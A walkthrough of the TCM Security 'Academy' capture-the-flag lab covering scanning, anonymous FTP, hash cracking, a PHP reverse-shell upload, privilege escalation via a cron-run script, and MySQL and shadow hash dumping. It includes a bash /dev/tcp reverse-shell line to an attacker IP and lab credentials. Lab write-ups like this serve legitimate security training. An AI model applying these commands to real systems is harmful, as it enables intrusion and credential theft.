Walkthrough: Academy Lab (PEH Capstone TCM Security)

Target IP: 192.168.1.108

Nmap Scan:

nmap -Pn -A -p- 192.168.1.10        

Enumeration:

FTP:

We use nmap service version and default script scan.

We found something called note.txt on the ftp. Lets try to login anonymously and get the file.

We see some details about database.

HTTP:

First thing first, lets check robots.txt and sitemap.xml.

Nothing found, just get Apache/2.4.38 version. sitemap.xml is the same.

Let try with nmap version detection,

Same result.

Try brute-forcing the directories using ffuf and gobuster.

ffuf -w /usr/share/wordlists/dirb/big.txt -u <https://192.168.1.108/FUZZ>        

gobuster dir -u 192.168.1.108 -w /usr/share/wordlists/dirb/big.txt        

Findings:

21/tcp open ftp vsftpd 3.0.3 - Anonymous FTP login allowed

*22/tcp open ssh SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2*

80/tcp open http Apache httpd 2.4.38 ((Debian))

jdelta - user and some Database info.

some directory: /academy, /phpmyadmin, /server-status

and a note.txt where we find database info

Exploitation:

FTP

We also find a hash from the note.txt. Let's work with that right now,

cd73502828457d15655bbd7a63fb0bc8

hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt        

The hash is student.

Student ID: 10201321

Password: student

HTTP

We can now try the ID and PASSWORD in the academy directory.

We can see there is an upload option. We can try to upload a reverse shell file here.

We are using a php-reverse-shell. Start listening with our attacker machine and upload the file.

We are now www-data users. We need to escalate our permission.

We are using Linpeas for privilege escalation.

We download linpeas on our local machine and host a web server then download it from our local machine to the target machine.

We need to give linpeas.sh execute permission then run it.

We found a user named “grimmie” who is in administrator group.

We found a password in the /var/www/html/academy/includes/config.php file

After seeing the file, we found mysql_username: grimmie, mysql_pass: My_V3ryS3cur3_P4ss.

We try to log into mysql database but failed. Let's use ssh

We successfully log into grimmie. If we check for files we can see a backup.sh some kind of script is here.

Maybe this is some kind of task or process running on the machine. But we don’t get any kind of information from crontabs or systemctl list-timers,

We can use a tool called pyps64 a linux process monitoring tool. Lets download and use this.

This tool will monitor all the process running on this server.

We can see that backup.sh is a process running and using /bin/bash.

We can use a reverse shell and reverse the backup.sh file so that the process execute our shell.

bash -i >& /dev/tcp/192.168.1.103/4444 0>&1        

When we wait for the process to execute we will get the shell.

We got our flag.

Others:

We try to get access of the data base using grimmie .

mysql -u grimmie -p //My_V3ryS3cur3_P4ss
show databases; //we are using mysql
use mysql;
show tables;
select * from user        

We found all the users and there password.

After cracking the hashes:

*8DEB44F79A130674A714BA1A66387EC111A82BD1 root:26021997

*03E2854B1BC2353C7FED1F780C55F7845322DC57 pma:pmapass

*FBAFF8215F65CDBF082236E749CD2D772DC921C7

Root’s /etc/shadow:

$6$ahtry9roVl5oY1fo$V87.ZOyfRA9cGeRawFky4jnS03RJeC6xqEYM5RmSzMABjzYtvAPiZtp0eRwdyj3qUoPhA2ZYD40h/nC6G0PnB.: tcm

We can now log into the root using ssh directly.

ssh [email protected] -p